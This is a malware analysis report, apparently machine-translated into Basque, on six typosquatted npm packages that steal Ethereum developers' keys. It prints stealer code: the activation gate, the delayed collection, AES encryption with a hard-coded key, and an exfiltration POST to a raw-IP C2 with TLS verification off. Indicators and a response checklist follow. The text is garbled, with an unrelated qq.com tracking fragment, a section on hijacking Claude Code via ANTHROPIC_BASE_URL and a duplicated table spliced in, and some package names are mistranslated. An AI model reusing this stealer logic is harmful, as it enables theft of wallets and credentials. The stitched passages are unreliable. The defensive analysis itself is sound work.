TL; DR
2026ko maiatzaren 6an, npm argitaratzaile bakar batek, namikazesarada010206-k sei pakete gaizto bultzatu zituen Ethereum, Solidity eta DeFi garatzaileen ekosistemari zuzenduta.
Paketeak, viem-core, viem-utils-core, hardhat-core-utils, evm-utils, foundry-utils, eta web3-utils-core, Web3 tresna ezagunen laguntzaile liburutegien itxura izateko diseinatutako izen sinesgarriak erabili zituen.
Sei pakete guztiek gauza bera zuten telemetry.js fitxategia. Fitxategia byte berdina zen kluster osoan, SHA-256rekin:
Malwarea ez da instalazio garaian exekutatzen. Ez dago preinstall or postinstall kakoa. Horren ordez, paketea inportatzen denean aktibatzen da require().
Xehetasun horrek garrantzia du.
Inplanteak garatzaile batek paketea benetan erabili arte itxaroten du. Ondoren, lan-estazioa benetako Ethereum / Solidity garapen ingurune baten itxura duen egiaztatzen du. Alchemy edo Infura gakoak, gako pribatuak, mnemoteknia, inplementatzaile gakoak edo Foundry direktorio lokal bat bilatzen ditu.
Host-a bat badator, lapurrak SSH gako pribatuak, Foundry / Geth / Brownie zorroaren gako-biltegiak biltzen ditu. .env* fitxategiak eta ingurune-aldagai sentikorrak. Paketea AES-256-GCM-rekin enkriptatzen du pasahitz gogor bat erabiliz eta TLS egiaztapena desgaituta duen IPv4 C2 amaiera-puntu gordin batera kanporatzen du.
Xygeniren Malware Goiztiarraren Abisua (MEW) sistemak sei paketeak gaiztoak direla baieztatu du. npm erregistroaren kentzeko txosten sorta zain dago.
Klusterra: Sei pakete, argitaletxe bat
Argitaratzailearen kontua. namikazesarada010206 egiaztatu gabeko Gmail helbidera lotuta zegoen namikazesarada010206@gmail.com.
Kanpaina egun bakarreko argitalpen-leherketa gisa agertu zen 2026ko maiatzaren 6an. Sei pakete guztiak honela bertsionatu ziren: 1.0.0, ez zuen exekuzio-mendekotasunik, eta hiru fitxategi bakarrik bidali zituen:
package.json index.js telemetry.js Iturburu-biltegi bera ere deklaratu zuten:
https://github.com/harunosakura030303-maker/evmchain-config Lehenengo hiru paketeak MEW eskanerrek lehen argitalpenean detektatu zituzten. Gainerako hirurak behartuta markatu ziren argitaratzailearen npm profila analisten berrikuspenaren ondoren. Behin byte berdinak... telemetry.js Klusterrean baieztatu zenez, koherentziaren arabera gaizto gisa itxi ziren.
| Package | Bertsio | npm Argitaratua | MEW Txartela | Epaia |
|---|---|---|---|---|
| viem-core | 1.0.0 | 2026-05-06 01:38:44Z | # 51049 | Kaltegarriak |
| viem-utils-core | 1.0.0 | 2026-05-06 | # 51050 | Kaltegarriak |
| hardhat-core-utils | 1.0.0 | 2026-05-06 | # 51051 | Kaltegarriak |
| evm-utils | 1.0.0 | 2026-05-06 | # 51069 | Gaiztoa, koherentziaz |
| galdaketa-utilitateak | 1.0.0 | 2026-05-06 | # 51071 | Gaiztoa, koherentziaz |
| web3-utilitateak-nukleoa | 1.0.0 | 2026-05-06 | # 51070 | Gaiztoa, koherentziaz |
Izendatzeko estrategia erraza baina eraginkorra da.
Pakete hauek ez dituzte goi-mailako izen zehatzak imitatzen. Horren ordez, "erabilgarritasun" atzizki sinesgarriak erabiltzen dituzte, hala nola -core, -utils, eta -utils-coreHorrek Web3 tresnen ondoan garatzaile batek ikustea espero dezakeen liburutegi osagarrien itxura ematen die.
| Pakete gaiztoa | Helburu legitimoa |
|---|---|
| viem-core | viem, Ethereum TypeScript bezero ezaguna |
| viem-utils-core | Viem |
| hardhat-core-utils | hardhat, Solidity garapen ingurune nagusi bat |
| evm-utils | EVM tresnen izen-espazio generikoa |
| galdaketa-utilitateak | galdaketa, Solidity tresna-katea |
| web3-utilitateak-nukleoa | web3-utils, Web3.js laguntzaileak |
Hau da “pakete osagarriaren” eredua: ez “ni naiz benetako paketea”, baizik eta “benetako paketearen inguruan laguntzaile arrazoizkoa naizela dirudi”.
Azkar mugitzen diren DeFi garatzaileentzat, hori nahikoa da arriskua sortzeko.
Zer gertatzen da paketea inportatzen denean
Eraso-katea txikia, nahita egindakoa eta kriptografia-garapen inguruneetan zentratua da.
Ez dago instalazio-kakorik. Horren ordez, pakete bakoitzak badu index.js stub funtzionalitatea esportatzen duena eta ondoren telemetria modulu gaiztoa kargatzen duena.
require('./telemetry').init(); Horrek esan nahi du malwarea lehenengo inportazioan aktibatzen dela.
Hori eragiketa aldetik erabilgarria da erasotzailearentzat. Eskaner eta sandbox askok instalazio-garaiko portaeran jartzen dute arreta. Pakete honek garatzaile, eraikuntza-skript, proba-multzo edo exekuzio-bide batek erabili arte itxaroten du.
Aktibazio Atea: Benetako Web3 Garatzaileen Lan-estazioetan Bakarrik Piztu
Inplantearen atalik garrantzitsuena aktibazio-atea da.
Malwareak Ethereum / Solidity garatzaileen makinetan ohikoak diren ingurune-aldagaiak egiaztatzen ditu:
const indicators = [ process.env.ALCHEMY_API_KEY, process.env.INFURA_KEY, process.env.PRIVATE_KEY, process.env.MNEMONIC, process.env.DEPLOYER_KEY, ].filter(Boolean); Foundry instalatuta dagoen ala ez ere egiaztatzen du:
fs.existsSync(path.join(os.homedir(), '.foundry')) Baldintza bat ere ez bada egia, funtzioak balioa itzultzen du eta ez du ezer egiten.
Horrek paketea isilagoa egiten du analisi-ingurune generikoetan. Foundry, Alchemy gako, Infura gako, gako pribatu edo mnemotekniarik gabeko sandbox batek inportazio kaltegabea izan dezake.
Ostalari bat datorrenean, malwareak 60 eta 90 segundo artean itxaroten du bildu aurretik:
setTimeout(() => { try { _collect(); } catch {} }, 60000 + Math.random() * 30000).unref(); Atzerapenak inportazioaren eta kanporatzearen arteko korrelazio agerikoa murrizten du. .unref() deiak ostalari-prozesuari normal irteteko aukera ere ematen dio paketea script laburreko batean inportatu bada.
Hau ez da zarata handiko apurtu eta hartu portaera bat. Lapurreta zuzendu bat da, garatzaile ingurunea lapurtzea merezi ez badu behintzat exekutatzea saihesteko diseinatua.
Lapurrak biltzen duena
Aktibazio atea igaro ondoren, malwareak Web3 garapenean garrantzitsuenak diren iturrietatik biltzen du informazioa: gako pribatuak, zorro-gakoen biltegiak, inplementazio-kredentzialak, hodeiko sekretuak, npm tokenak eta tokiko proiektuaren konfigurazioa.
| Iturria | Zer bildu da |
|---|---|
| prozesua.ingurunea | Edozein aldagai bat datorren /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | PRIVATE KEY edo BEGIN OPENSSH dituzten fitxategiak, fitxategiaren eduki osoa barne. |
| ~/.foundry/giltza-dendak/* | Foundry zorroaren giltza-biltegi fitxategiak |
| ~/.ethereum/giltza-denda/* | Geth zorroaren giltza-biltegi fitxategiak |
| ~/.brownie/kontuak/* | Brownie zorroaren giltza-biltegiko fitxategiak |
| ${cwd}/.ingurunea | Fitxategiaren eduki osoa |
| ${cwd}/.env.local | Fitxategiaren eduki osoa |
| ${cwd}/.env.production | Fitxategiaren eduki osoa |
| ${cwd}/.env.development | Fitxategiaren eduki osoa |
| os.hostname() | Ostalariaren metadatuak |
| kripto.ausazko UUID() | Biktima/saioaren identifikatzailea |
| Data.orain() | Bilduma denbora-zigilua |
otheve.beacon.qq.com oth.str.beacon.qq.com h.trace.qq.com ATTA tokenak hauek dira:
ATTA_ID 00400014144 ATTA_TOKEN 6478159937 Ezin izan dugu baieztatu telemetria operadorearen beraren analisiak ziren ala monetizatutako kanal bereizi bat. ATTA tokenak berdinak dira aztertu ditugun bi laginetan.
B multzoa: heibai
claude.hk OAuth Phishing + ANTHROPIC_BASE_URL Bahiketa
Apirilaren 1eko lagina kanpainaren atal gordinagoa eta goiztiarra da.
heibai:2.1.88-claude.hk-4 argitaratu zuen wuguoqiangvip28, 2025eko ekainaren 7an sortutako kontu bat. Paketeak berariaz bertsionatu zuen bere burua legezko balioen aurka 2.1.88 Askapen antropikoa.
Ez du CA-cert MITM-rekin kezkatzen. Horren ordez, gezurra esaten dio erabiltzaileari OAuth amaiera-puntuaren inguruan.
Claude Code iturriaren gainean dauden gehigarri gaiztoen artean daude:
| Iturria | Zer bildu da |
|---|---|
| prozesua.ingurunea | Edozein aldagai bat datorren /TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i |
| ~/.ssh/* | PRIVATE KEY edo BEGIN OPENSSH dituzten fitxategiak, fitxategiaren eduki osoa barne. |
| ~/.foundry/giltza-dendak/* | Foundry zorroaren giltza-biltegi fitxategiak |
| ~/.ethereum/giltza-denda/* | Geth zorroaren giltza-biltegi fitxategiak |
| ~/.brownie/kontuak/* | Brownie zorroaren giltza-biltegiko fitxategiak |
| ${cwd}/.ingurunea | Fitxategiaren eduki osoa |
| ${cwd}/.env.local | Fitxategiaren eduki osoa |
| ${cwd}/.env.production | Fitxategiaren eduki osoa |
| ${cwd}/.env.development | Fitxategiaren eduki osoa |
| os.hostname() | Ostalariaren metadatuak |
| kripto.ausazko UUID() | Biktima/saioaren identifikatzailea |
| Data.orain() | Bilduma denbora-zigilua |
Helburu zerrenda oso zehatza da. Hau ez da nabigatzaile lapurreta generikoa edo kredentzial scraping zabala. Ethereum aplikazioak eraikitzen, probatzen, zabaltzen edo erabiltzen dituzten garatzaileei zuzenduta dago.
Bereziki garrantzitsua da Foundry, Geth eta Brownie gako-biltegiak sartzea. Fitxategi hauek zorroetarako edo hedapen-identitateetarako sarbide zuzena adieraz dezakete. Erasotzaileak pasahitz, mnemoniko edo ingurune-sekretuekin parekatu baditzake, funtsak mugitu, hedatzaileak ordezkatu edo kontratu adimendunen eragiketak arriskuan jarri ahal izango ditu.
Enkriptazioa kanporatzea baino lehen
Malwareak bildutako datuak bidali aurretik enkriptatzen ditu.
const key = crypto.createHash('sha256').update(K).digest(); const iv = crypto.randomBytes(12); const cipher = crypto.createCipheriv('aes-256-gcm', key, iv); Gogor kodetutako pasahitz hau da:
a]3Fk9$mP2xL7vQ8nR4wJ6yB0tH5cE1d Azken karga JSON gisa bilduta dago:
{"v":2,"iv":"<base64>","d":"<base64-ciphertext>","t":"<base64-gcm-tag>"} Enkriptazioak ez du malwarea aurreratuago egiten berez. Hala ere, sarearen ikuskapena zailtzen du. Irteera zaintzen duen defendatzaile batek JSON karga ikusiko luke, baina ez lapurtutako giltzak, zorro fitxategiak edo .env edukia pasahitz gogorrik eta deszifratze logikarik gabe.
IPv4 C2 gordinera exfiltratzea
Iragazki-bidea gogor kodetuta dago:
const req = https.request({ hostname: '76.13.37.80', port: 8443, path: '/api/v1/telemetry', method: 'POST', headers: { 'Content-Type': 'application/json', ... }, rejectUnauthorized: false, timeout: 8000, }, () => {}); Malwareak datuak honera bidaltzen ditu:
https://76.13.37.80:8443/api/v1/telemetry Bi xehetasun nabarmentzen dira.
Lehenik eta behin, C2 IPv4 helbide gordina da, domeinu bat baino gehiago. Horrek domeinua erregistratzeko beharra kentzen du eta domeinuetan oinarritutako detekzio batzuk saihesten ditu.
Bigarrenik, TLS egiaztapena desgaituta dago honekin:
rejectUnauthorized: false Horri esker, malwareak edozein ziurtagiri onar dezake, auto-sinatutako ziurtagiriak barne. Beste era batera esanda, erasotzaileak garraio enkriptatua lortzen du baliozko ziurtagiri publiko baten beharrik gabe.
Ez dago berriro saiatzeko logikarik eta ez dago ordezko ostalaririk. Erroreak isilean irensten dira. Horrek paketea isilpean mantentzen du C2 lineaz kanpo edo eskuraezina bada.
Zergatik garrantzitsua da kanpaina honek
Garatzaileei zuzendutako npm pakete gaizto gehienek kredentzial zabalak bilatzen dituzte: npm tokenak, AWS giltzak, GitHub tokenak edo .npmrc fitxategiak.
Kanpaina honek helburua murrizten du.
Makina Ethereum edo Solidity garatzaile batena dela adierazten duten zantzuak bilatzen ditu. Ondoren, ingurune horretan garrantzitsuak diren aktiboak ateratzen ditu: zorro-gako-biltegiak, gako pribatuak, mnemoteknia, inplementatzaile-gakoak, .env fitxategiak eta SSH gakoak.
Horrek kanpaina Web3 taldeentzat arriskutsuagoa egiten du npm lapur generiko bat baino.
Infekzio arrakastatsu batek agerian utz dezake:
- Hedapen-zorroak
- Kontratu adimendunen administrazio-giltzak
- RPC hornitzailearen gakoak
- Hodeiko hedapen-kredentzialak
- npm argitalpen tokenak
- SSH sarbidea garatzaile edo eraikitzaile azpiegituretara
- Proiektuaren sekretuak gordeta
.envfitxategiak - Foundry, Geth edo Brownie-rentzako zorro-giltza-biltegiak
Paketeen izenek ere ingeniaritza sozial argia erakusten dute. Web3 garatzaileen ekosistemari zuzenduta daude tresna-izen ezagunen bidez: viem, hardhat, foundry, evm, eta web3.
Aktoreak ez du benetako proiektuak arriskuan jarri beharrik. Garatzaile bat besterik ez dute behar itxuraz pakete osagarri arrazoizkoa instalatzeko.
Konpromisoaren eta Detekzioaren Adierazleak
| Paketeak eta argitaratzailea | |
|---|---|
| Field | Balio |
| npm argitaratzailea | namikazesarada010206 |
| Argitaratzailearen helbide elektronikoa | namikazesarada010206@gmail.com |
| posta elektronikoa egiaztatuta | Ez |
| SCM egiaztatu | Ez |
| Ospe puntuazioa | 1.0 |
| Paketeak | viem-core, viem-utils-core, hardhat-core-utils, evm-utils, fundry-utils, web3-utils-core |
| Bertsioak | Guztiak 1.0.0 |
| Iturburu-biltegia | https://github.com/harunosakura030303-maker/evmchain-config |
| Gaiztoa baieztatuta | Sei pakete guztiak |
| Sarea | |
|---|---|
| Mota | Balio |
| C2 amaiera-puntua | https://76.13.37.80:8443/api/v1/telemetry |
| C2 IP | 76.13.37.80 |
| C2 ataka | 8443/tcp |
| TLS portaera | ukatuBaimenik gabe: faltsua |
| Karga-eskema | {"v":2,"iv": "d": ,"t": } |
| Fitxategiak eta hashak | |
|---|---|
| Mota | Balio |
| telemetria.js SHA-256 | 71426e93cb6143052d5aeeca920850f8a0343c95bc65aab9a15145848cc5bff1 |
| Paketearen diseinua | package.json, index.js, telemetry.js |
| Fitxategi kopurua | 3 |
| Gutxi gorabeherako tamaina osoa | 3.4 KB |
Aktibazio seinaleak
Malwareak ingurune-aldagai hauek egiaztatzen ditu:
ALCHEMY_API_KEY INFURA_KEY PRIVATE_KEY MNEMONIC DEPLOYER_KEY Honako hauek ere egiaztatzen ditu:
~/.foundry/ Helburuko ostalarien bideak
~/.ssh/* ~/.foundry/keystores/* ~/.ethereum/keystore/* ~/.brownie/accounts/* ${cwd}/.env ${cwd}/.env.local ${cwd}/.env.production ${cwd}/.env.development Bilduma Regex
/TOKEN|SECRET|KEY|PASS|AUTH|PRIVATE|SEED|MNEMONIC|AWS|NPM|DEPLOY/i Detekzio Oharrak
Hainbat arauk kanpaina hau harrapatzen dute portaeraren analisi osoa behar izan gabe.
Lehenik eta behin, eskaneatu blokeo-fitxategiak sei pakete-izen gaiztoen bila:
viem-core viem-utils-core hardhat-core-utils evm-utils foundry-utils web3-utils-core Edozein partida package-lock.json, yarn.lock, pnpm-lock.yamlEdo node_modules historia gertakari larri gisa hartu behar da.
Bigarrenik, Node.js prozesuak zorroaren gako-biltegiaren bideak irakurtzen dituzten kontrolatu:
~/.foundry/keystores/ ~/.ethereum/keystore/ ~/.brownie/accounts/ Laguntzaile-mendekotasun gisa inportatutako pakete batentzat gutxitan izaten da portaera zilegi hau. Bereziki susmagarria da sareko irteerako jarduera baten ondoren datorrenean.
Hirugarrenik, blokeatu edo alertatu HTTPS konexioak honako hauei:
76.13.37.80:8443 Batez ere eskaeraren bidea hau denean:
/api/v1/telemetry Laugarrenik, bilatu ezaugarri hauek konbinatzen dituzten npm paketeak:
- Argitaletxe berria edo ospe txikikoa
- Gmail kontu egiaztatu gabea
- Web3-ren ondoko paketearen izena
- Ez dago biltegiko historia esanguratsurik
- Pakete txikien diseinua
index.jstelemetria edo laguntzaile fitxategi bat kargatzen duena- Ez dago exekuzio-mendekotasunik
- Ingurune-aldagai sentikorren bilduma
- Diru-zorroaren giltza-biltegirako sarbidea
Eredu hau IOC bakarra baino erabilgarriagoa da, hurrengo paketeak IP helbidea alda baitezake baina helburu-logika bera mantenduz.
Konpromiso Erantzunaren Kontrol-zerrenda
Garatzaile batek sei paketeetako bat erabili badu eta bere ingurunea aktibazio-atearekin bat badator, lan-estazioa arriskuan dagoela esan nahi du.
Horrek barne hartzen ditu Foundry instalatuta duten makinak, inguruneko Alchemy edo Infura gakoak, gako pribatuak, mnemoteknia edo inplementatzaile gakoak.
Gomendatutako erantzuna:
- Deskonektatu ostalaria saretik.
- Ganboa
node_modules, blokeo-fitxategiak, shell historia eta auzitegi-analisietarako erregistro garrantzitsuak. - Biratu SSH gako-pare bakoitza azpian
~/.ssh/. - Biratu zorroaren giltzak giltza-biltegi bakoitzaren azpian
~/.foundry,~/.ethereum, eta~/.brownie. - Mugitu funtsak zorro berrietara.
- Biratu gordetako sekretu guztiak
.env*Garatzaileak lan egin zuen biltegietako fitxategiak. - Txandakatu bildumaren erregexarekin bat datozen ingurune-sekretuak, besteak beste, AWS gakoak, npm tokenak, inplementazio-tokenak, API gakoak, gako pribatuak, haziak eta mnemonikoak.
- Auditatu hodeiaren, npmren, GitHub-en, RPC hornitzailearen eta blockchain-aren jarduera paketea lehen aldiz instalatu zenetik.
- Berriro erabili aurretik, berriro irudikatu lan-estazioa.
Zer eraman beharko lukete defendatzaileek
Kanpaina honek npm typosquatting-a nola eboluzionatzen ari den erakusten du balio handiko garatzaileen ekosistemen inguruan.
Aktoreak ez zuen iraunkortasunik behar. Ez zuten nahasmendurik behar. Ez zuten instalazio-garaian exekutatzeko beharrik ere.
Horren ordez, hiru gauzetan oinarritu ziren:
- Web3 pakete izen sinesgarriak
- Aktibazioa benetako kriptografia-garapen makinetan bakarrik
- Ethereum garatzaileentzat garrantzitsuenak diren fitxategien eta sekretuen lapurreta zuzena
Horrek kanpaina erraz galtzea egiten du eskaneatze orokorrean eta arriskutsua ingurune egokian erortzen denean.
Web3 taldeentzat, ikasgaia argia da: mendekotasun izenak mehatxu ereduaren parte gisa tratatu. Laguntzaile kaltegabe baten itxura duen pakete bat zorroa arriskuan jartzeko biderik laburrena izan daiteke oraindik ere.
npm erregistroari jakinarazi zaio. Argitaratzaile kontua eta paketeak kentzen direnean mezu hau eguneratuko dugu.




